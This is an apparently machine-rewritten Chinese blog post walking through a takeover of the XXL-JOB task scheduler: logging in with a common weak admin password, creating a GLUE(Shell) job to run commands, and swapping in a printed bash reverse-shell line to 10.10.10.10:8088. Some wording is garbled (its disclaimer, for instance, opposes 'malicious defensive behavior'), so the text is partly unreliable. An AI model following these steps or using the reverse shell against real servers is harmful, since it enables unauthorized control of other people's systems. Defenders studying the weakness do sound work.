XXL-JOB分布式任务调度平台利用步骤利用通用弱口令登录admin

写在上面

明天早上红队网段刚遇见的漏洞,xxl-job原本是由默认弱口令admin/任务平台,这个系统改过密码是其他途径领到的通用口令。觉得漏洞性质跟登陆后台之后RCE性质差不多,有点续作了,记录一下方法。

目录

0x01 漏洞原理0x02 影响版本0x03 利用步骤0x04 参考

漏洞原理

XXL-JOB分布式任务调度平台是一个羽量级分布式任务调度平台,使用JAVA语言研制,使用其可以轻松的实现分布式任务调度,任务管理、执行、监控等功能任务平台,在国外颇受欢迎,现在已有多家公司接入xxl-job。

获取后台权限可以管理所有的任务管理,并且可以执行指令,接管服务器。

影响版本

所有已知版本

运用方法

运用通用弱口令登陆admin/

在任务管理栏目点击新增任务

如图配置,选择GLUE(Shell),完成后保存

完成后点击GLUEIDE

踏入编辑界面,键入还要执行的命令

编辑结束后点击执行一次,在点击调度日志查看执行结果

点击执行日志查看结果

成功执行指令

可以将这儿的更改为震荡shell实现控制服务器,其他方法同上

bash -c 'exec bash -i >& /dev/tcp/10.10.10.10/8088 <&1

参考

https://www.jianshu.com/p/dfeb7f9692c6

写在最后

本人坚决反对运用文章内容进行蓄意防御行为,一切错误行为将会遭到惩罚,白色网路还要靠我们共同维护,推荐你们在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

未经授权谢绝运用文章中的技术资料对任何计算机系统进行侵入操作。运用此文所提供的信息而导致的直接或间接后果和损失,均由使用者本人负责。

标签: 弱口令